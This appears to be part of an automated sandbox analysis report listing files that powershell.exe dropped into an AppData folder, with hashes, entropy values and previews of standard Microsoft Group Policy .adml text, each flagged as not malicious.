                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="MobilityCenterCat">Windows Mobility Center</string>.. <string id="MobilityCenterEnable">Turn off Windows Mobility Center</string>.. <string id="MobilityCenterEnableExplain">This policy setting turns off Windows Mobility Center.....If you enable this policy setting, the user is unable to invoke Windows Mobility Center. The Windows Mobility Center UI is removed from all shell entry points and the .exe file does not launch it.....If you disable this policy setting, the user is able to invoke Windows Mobility

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\MobilePCPresentationSettings.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (366), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1482
                                                                                                                                                                                                        Entropy (8bit):4.847847941024891
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ycjpb3BnEndr90fFV:cgeD5x8gm8fKrV3Bn2RSfFV
                                                                                                                                                                                                        MD5:3D1BC388407E64D128728E5259ADAC99
                                                                                                                                                                                                        SHA1:AAF0BD72A00F01936A1B8CFF0DD9F43B4A5DEB06
                                                                                                                                                                                                        SHA-256:EC7D1B396B99416F267F99BA8D7A81199284C01CAE1A19081F2670233FA02F20
                                                                                                                                                                                                        SHA-512:68A27081AA8ABEAECED75720102C4712FCBFB0BF77918A8C47C62BA0EC4FA0F369DD605A91AF0B671DC079053F0A1328B6F5DBA9A0623E8B03095FCB65F6D83C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PresentationSettingsCat">Presentation Settings</string>.. <string id="PresentationSettingsEnable">Turn off Windows presentation settings</string>.. <string id="PresentationSettingsEnableExplain">This policy setting turns off Windows presentation settings.....If you enable this policy setting, Windows presentation settings cannot be invoked.....If you disable this policy setting, Windows presentation settings can be invoked. The presentation settings icon will be displayed in the notification area. This wi

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Msi-FileRecovery.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (333), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3082
                                                                                                                                                                                                        Entropy (8bit):4.810214089047188
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKyxgteEKvv4NYlVOdX71JDerq5x0BsYu9tP4XEgV:LeD5pmHWwua5PD2qjCsNtPeV
                                                                                                                                                                                                        MD5:DA778ED24DE53EF1BAF75408032E34A8
                                                                                                                                                                                                        SHA1:20B3E050E4094CDEA1765EFA73AE92DADF4D3F18
                                                                                                                                                                                                        SHA-256:1FA3057260F8642ADAF7C30D68CBDF5703BCBE983ACBEB0335FD31347D8CE4CB
                                                                                                                                                                                                        SHA-512:393A383F1CA87036A1893150514276B1277816CDAAC1704891D0345C1464D53B22C0ACD752EAF4B130EA8E3C40C3B4AC86FDADBBCD2F792414E79575C746BD82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="WdiScenarioCategory">MSI Corrupted File Recovery</string>.. <string id="WdiScenarioExecutionPolicy">Configure MSI Corrupted File Recovery behavior</string>.. <string id="WdiScenarioExecutionPolicyExplain">This policy setting allows you to configure the recovery behavior for corrupted MSI files to one of three states:....Prompt for Resolution: Detection, troubleshooting, and recovery of corrupted MSI applications will be turned on. Windows will prompt the user with a dialog box when application reinstallat

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\NAPXPQec.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                                        Entropy (8bit):5.0468646750436905
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61ylySwH3ZhAEonuYNuEZsFV:cgeD5x8gm8fKiSYdmFV
                                                                                                                                                                                                        MD5:A4208900FDE8B3665E5C81E299CA7BFF
                                                                                                                                                                                                        SHA1:D15B972870FC4A1FBFF2E709DBC6AB031E4A46E6
                                                                                                                                                                                                        SHA-256:156AC533DE885DE2086D1506713B46BFBCFDEB20FCD783B16C3CD4C143868549
                                                                                                                                                                                                        SHA-512:A40CFC29E6C50B0CE4D98A1F9FFF71DBB17C8A33C7018BD9C4BD80BC31257D279F75057C3EEE1AC47F5A40FC16493D188CEFFAC7B0F5C70D16E22B1A492AC97D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NAP_Category">Network Access Protection</string>.. <string id="NAP_XP_1x_QEC">Allow the Network Access Protection client to support the 802.1x Enforcement Client component</string>.. <string id="NAP_XP_1x_Help">This policy setting allows the Network Access Protection (NAP) client to support the Windows XP version of the 802.1x Enforcement Client component.....If you enable this policy setting, NAP allows the Windows XP version of the 802.1x Wireless Enforcement Client to participate. ....If you disa

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\NCSI.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (417), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5609
                                                                                                                                                                                                        Entropy (8bit):4.807720215972321
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:oD5pmB6SbbXVjG7/loPSNYOag8hW3QDFzdQFXukdFeYoZTe2FRA15VrpbWFo9FV:+jErVjGmighWmAd8KoPe
                                                                                                                                                                                                        MD5:C62CBB79E2AF2E3CC1FD69206D0C9716
                                                                                                                                                                                                        SHA1:3C18FFFC927A30CCD66B2D23D553BCA29642497D
                                                                                                                                                                                                        SHA-256:5E583582C0A4A933C3A0E4A4270E034DE6B8DD23B2676A1ECAD986DB71F28E7D
                                                                                                                                                                                                        SHA-512:B65C8F3EF4A1DBA11E8E915F8E31A874E83042923F98941CD8441066C103ABBB61A720BF24729CE17DEDC1916873BB86E7C5E1830D4AA96982EE0592E3830F2D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2008 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Connectivity Status Indicator Group Policy Settings</displayName>.. <description>Network Connectivity Status Indicator Group Policy Settings</description>.. <resources>.. <stringTable>.. <string id="NCSI_Category">Network Connectivity Status Indicator</string>.. <string id="NCSI_CorpWebProbeUrl">Specify corporate Website probe URL</string>.. <string id="NCSI_CorpWebProbeUrl_Help">This policy setting enables you to specify the URL of the corporate website, against which an active probe is performed.</string>.. <string id="NCSI_CorpDnsProbeHost">Specify corporate DNS probe host name</string>.. <string id="NCSI_CorpDnsPro

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\Netlogon.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (1008), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):46428
                                                                                                                                                                                                        Entropy (8bit):4.777664679838725
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:MwjkYrp+MHlkfrwiTrotseXkz4l/hHui7n421:/wYrcMHlkfrwiTrot3Xk8l9uM40
                                                                                                                                                                                                        MD5:B6CB2AF44B11487F92D14A3E9B7B4F70
                                                                                                                                                                                                        SHA1:DCFC1F715BD49D62021568F76D8CD3BBB85D01CF
                                                                                                                                                                                                        SHA-256:14B401FBE6F5FD279430D383196F16AC0D93EE665D0225C7F2C4C3DD56D7B847
                                                                                                                                                                                                        SHA-512:7373B5EFF0A8574961C7373CEF567071852FB57663978ED9E1A8BB2E9B6E4AB1390260204B518D40621AEC4B5F14A18793BE7D4550ADABBA0BDA11FFA90EEA6A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Netlogon">Net Logon</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain">Use DNS name resolution with a single-label domain name instead of NetBIOS name resolution to locate the DC</string>.. <string id="Netlogon_AllowSingleLabelDnsDomain_Help">This policy setting specifies whether the computers to which this setting is applied attempt DNS name resolution of a single-label domain names.....By default, the behavior specified in the AllowDnsSuffixSearch is used. If the AllowDnsSuffixSearch policy is d

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\NetworkConnections.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (1486), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):41991
                                                                                                                                                                                                        Entropy (8bit):4.576451646468249
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:0dx8EooEviP1PjM6PtCldxD9xI2FzOkRZWx+LmCYvecgy3W7dlDelurmYEg4g+z/:iFOI
                                                                                                                                                                                                        MD5:0F0684FA5CF664EAF158690457E68D92
                                                                                                                                                                                                        SHA1:DFA272AD045597933D1144F01921EABA0B6BC4A4
                                                                                                                                                                                                        SHA-256:E86F5AD0D0A55ED34D90A2EE7222564656C684FCA48F9CE2C0363266C7C10ECE
                                                                                                                                                                                                        SHA-512:ED1BEF62FA7CECD3E618F31D951259704A13910E4AD3276C396003AF543EE6C6FBC86E4573366D6103D997B1C2DE98E879AE08BAB5676BE2F12579CBEDDD7D10
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="NC_AddRemoveComponents">Prohibit adding and removing components for a LAN or remote access connection</string>.. <string id="NC_AddRemoveComponents_Help">Determines whether administrators can add and remove network components for a LAN or remote access connection. This setting has no effect on nonadministrators.....If you enable this setting (and enable the "Enable Network Connections settings for Administrators" setting), the Install and Uninstall buttons for components of connections are disabled, and admini

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\NetworkIsolation.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:exported SGML document, ASCII text, with very long lines (461), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6746
                                                                                                                                                                                                        Entropy (8bit):4.9079819692940125
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:V+D5pmzqJhUf3fJyoZ+EsiZoTCdhY5+J6M6xpBGbvH4J5w4V:qdU/hyoXZoSrJ6nxpkbvHKN
                                                                                                                                                                                                        MD5:39E7220D62B6A3DBB2C126FBB57233BA
                                                                                                                                                                                                        SHA1:FA2CA706CB425FF910215D0E0D84DC05FEC673B6
                                                                                                                                                                                                        SHA-256:D7FDCFBCAD3F6A8CAE618320A16E408B4EF7A2830EBE54AC141F8CD37C4B26D2
                                                                                                                                                                                                        SHA-512:843380F52E434137DE92DF229B2C5103223EB4A22C6A52FC679B63A943938BD38B5AA5167F4DDB6620E921CEA1315B1EA84E1847AD83C780419FC1470E93E9BE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview: (c) 2011 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>Network Isolation </displayName>.. <description>Configures Network Isolation Options for apps </description>.. <resources>.. <stringTable>.. .<string id="WF_Isolation">Network Isolation</string>........ Define server addresses that proxy to the Internet -->......<string id="WF_NetIsolation_Domain_Proxies">Internet proxy servers for apps</string> ...<string id="WF_NetIsolation_Domain_Proxies_Help"> This setting does not apply to desktop apps......A semicolon-separated list of Internet proxy server IP addresses. These addresses are categorized as Internet by Windows Network Isolation and are accessible to apps that have the Internet Client or Internet Client/Server capabilities....

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\NetworkProjection.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2267
                                                                                                                                                                                                        Entropy (8bit):4.838388154516794
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:cgeD5x8gm8fKQqmmBpOVxwxpBewWk7EQg+61kg+6xrjMWK/WV:LeD5pmEqmmp8xwLBzWkiz/zZjMWK/WV
                                                                                                                                                                                                        MD5:1AEA64EE82CCCF20BE4E7178E0D9C569
                                                                                                                                                                                                        SHA1:674AC6F5BD545EB75E05FED6CDD384C4440C2B29
                                                                                                                                                                                                        SHA-256:615E09EEC96E2E99550CA7014AD5E7249C031E1E19B2241032C1BE983622729D
                                                                                                                                                                                                        SHA-512:0FDE894C202D495A8A674E637B6E5B1BE25333C1D4BFECA1CA3503A19E43ECB847131FF32B81145822C87513C308C07B9CBB8A519A62999FA992CB28C3348210
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="DisableNetworkProjector">Turn off Connect to a Network Projector</string>.. <string id="DisableNetworkProjectorExplain">This policy setting disables the Connect to a Network Projector wizard so that users cannot connect to a network projector. ....If you enable this policy setting, users cannot use the Connect to a Network Projector Wizard to connect to a projector. ....If you disable or do not configure this policy setting, users can run the Connect to a Network Projector Wizard to connect to a projector.</st

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\OfflineFiles.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (634), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):50909
                                                                                                                                                                                                        Entropy (8bit):4.7108422069629725
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:c5kq1yeql7iURcwKILdZoJ7TCFRFzMOXIo:ZekZMOD
                                                                                                                                                                                                        MD5:845935D73456E658B4DD9CB27224CBF7
                                                                                                                                                                                                        SHA1:7336E494495EB05622F3791BC19E46499B3B60DE
                                                                                                                                                                                                        SHA-256:169924EB41BD644647F5F4710438C757F1C3BEF0196D4D09CBF9B52D05D17A47
                                                                                                                                                                                                        SHA-512:9F6BDF080314A23D1A82321CB3C8171130695E82205F32E895A7C1EEDAE59571E2C22E09171FA9377BC429A0E8118E44E151754ED2FF1A63B112494F54A9FF02
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="Cat_OfflineFiles">Offline Files</string>.. <string id="Lbl_Fail">Never go offline</string>.. <string id="Lbl_FullSync">Full</string>.. <string id="Lbl_QuickSync">Quick</string>.. <string id="Lbl_WorkOffline">Work offline</string>.. <string id="Pol_AlwaysPinSubFolders">Subfolders always available offline</string>.. <string id="Pol_AlwaysPinSubFolders_Help">Makes subfolders available offline whenever their parent folder is made available offline.....This setting automatically extends the

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\P2P-pnrp.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with very long lines (447), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15965
                                                                                                                                                                                                        Entropy (8bit):4.663039279812552
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:EVvPk2QsF4WSKheDnylZ+QsF4W+KheDnyxko4QsF4WnKheDnyGS8OzsO4WdmI:OLvhwTjhwK4khwQ8wr
                                                                                                                                                                                                        MD5:4CE12CD17365AE6E6C922AE0C3D70110
                                                                                                                                                                                                        SHA1:328E59731F170FD42BA614E5FD6AC09AAD91C8D5
                                                                                                                                                                                                        SHA-256:D262B118B555E83840A9AC077963B0E50F589C09950F77EB5865D25776D1A78B
                                                                                                                                                                                                        SHA-512:41B5A3AF2D00993E50B4DA53132DFF75F07B549405C88589FB96AA85E074C418CA35931FA1B674EF7129B3495FABE404EF4A74F4C20A48BDE6F3E7A7408583A6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="P2P_Disabled">Turn off Microsoft Peer-to-Peer Networking Services</string>.. <string id="P2P_Disabled_Explain">This setting turns off Microsoft Peer-to-Peer Networking Services in its entirety, and will cause all dependent applications to stop working.....Peer-to-Peer protocols allow for applications in the areas of RTC, collaboration, content distribution and distributed processing.....If you enable this setting, peer-to-peer protocols will be turned off.....If you disable this setting or do not configure it,

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\ParentalControls.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1084
                                                                                                                                                                                                        Entropy (8bit):5.01040774159096
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yDTRc42cN28Ml28Sv7T8MZFV:cgeD5x8gm8fKitDvNQlGVFV
                                                                                                                                                                                                        MD5:2DD43AEA1D0F6713F020401FC72878BC
                                                                                                                                                                                                        SHA1:4A8B428938DB72FC55F5EA72F95E9323BE1B4192
                                                                                                                                                                                                        SHA-256:FC70BC44ADAEC32E39A503CEEC2F52B98C697D61BE6C120A96480445A968FE5A
                                                                                                                                                                                                        SHA-512:CB4FC3B7FC46F1CBFEE1EDA2B6D51ECE2E8DBE983BB0D083109D999AC020634721FD3B42D917FEB9146A12F86D79389FAA6B95CA0832F58CC063B22D0C4B882B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="ParentalControls">Family Safety</string>.. <string id="ParentalControls_EnableOnDomain_help">This policy setting allows you to configure the Family Safety feature.....If you enable this policy setting, the Family Safety control panel is visible on a domain joined computer.....If you disable or do not configure this policy setting, the Family Safety control panel is not visible on a domain joined computer.</string>.. <string id="ParentalControls_EnableOnDomain">Make Family Safety control panel visible on a

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\PeerToPeerCaching.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (754), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):24638
                                                                                                                                                                                                        Entropy (8bit):4.564624284444478
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:N1iKAegTK4PjZqKNomwtzxkBK8R02vXkh3RIaImzg6h3hquhT:N1itegT5PjsQHwtzxkBJR9yqmzh3N
                                                                                                                                                                                                        MD5:B5D667D298E0EDCC6D2FB6F0C01B7223
                                                                                                                                                                                                        SHA1:931DE60F0DBE31DC890905C6D7ACC05112F810A8
                                                                                                                                                                                                        SHA-256:673CB9F3C9B5B753C41C6B44519A04C32A10ABD90533CEC88E4AD20A0E564D55
                                                                                                                                                                                                        SHA-512:44C5535A92A8DE5364FCC39ED26171BBA4C25DDE495BFA9A9695A7F2E7F579AE08D972CAFF848ED9D5A6339307EA3CD2033838FF8AE006340D2CCB8A9F90ADB9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>BranchCache</displayName>.. <description>BranchCache enables clients to securely retrieve content from within the branch office instead of having to retrieve it from the server hosting the content. Depending on the deployment mode, the content can be retrieved from other clients in the branch office or from a hosted cache server in the branch. A client can only retrieve content from within the branch if it is authorized by the server to do so. The use of BranchCache reduces costs on the wide area network (WAN) link that connects your branch offices to the data center or headquarters and increases download speeds for content that has already been downl

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\PenTraining.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1208
                                                                                                                                                                                                        Entropy (8bit):5.027249517124002
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2dgeD5eo8gWt4+3Fbef61yx9WmOQzWmYKAQKvqmiHAQKvMFV:cgeD5x8gm8fKAQmOVmYHimTHkFV
                                                                                                                                                                                                        MD5:7B4EC129E00834B2E499BEBCE8E75083
                                                                                                                                                                                                        SHA1:D4BEA36D9A628D70055431E5A6967BAF87294A02
                                                                                                                                                                                                        SHA-256:A00BB104395F6DC86AF2921893AF3BC129D7A2A2DDFA5CCA22FF6D055AF11E31
                                                                                                                                                                                                        SHA-512:5A5E2389AB7A3C432FEEB8D68F1C144A1525934FC1FA8442E8C12CC11652FEDF101E73AD8D10197FDC0F6AF0DA2D887BEFE2BAD792BEF4E943DD9C71EBAEB2F6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. (c) 2006 Microsoft Corporation -->..<policyDefinitionResources xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" revision="1.0" schemaVersion="1.0" xmlns="http://schemas.microsoft.com/GroupPolicy/2006/07/PolicyDefinitions">.. <displayName>enter display name here</displayName>.. <description>enter description here</description>.. <resources>.. <stringTable>.. <string id="PenTraining">Tablet PC Pen Training</string>.. <string id="PenTrainingOff">Turn off Tablet PC Pen Training</string>.. <string id="PenTrainingOff_Help_LOCALMACHINE">Turns off Tablet PC Pen Training.....If you enable this policy setting, users cannot open Tablet PC Pen Training.....If you disable or do not configure this policy setting, users can open Tablet PC Pen Training.</string>.. <string id="PenTrainingOff_Help_USER">Turns off Tablet PC Pen Training.....If you enable this policy setting, users ca

                                                                                                                                                                                                        C:\Users\user\AppData\Roaming\FeGIPCnK\Data\en-US\PerformanceDiagnostics.adml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines (577), with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8181
                                                                                                                                                                                                        Entropy (8bit):4.68291957028103
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:E65cdjVSpt6DejVSpOZq1jVSpWLqXjVSpsHz2TgS:bk4md
                                                                                                                                                                                                        MD5:1242B4E18BC034195D7064E4CDEB8B92
                                                                                                                                                                                                        SHA1:4BF81B86AC91ED3B51C97569728CD29858459D68
                                                                                                                                                                                                        SHA-256:29F060D6A4CA93A94F33D46150AF949B5F2EB63214AF05C5700E552555F81C54
                                                                                                                                                                                                        SHA-512:0A17703E8858409CB9AEBE827143EA77516576F473AC18873B3848F4A4D000F739E757655945CAB3DBE8E05B06496E07C2C8C7811CE5D7407153D9B167B8015E
                                                                                                                                                                                                        Malicious:false
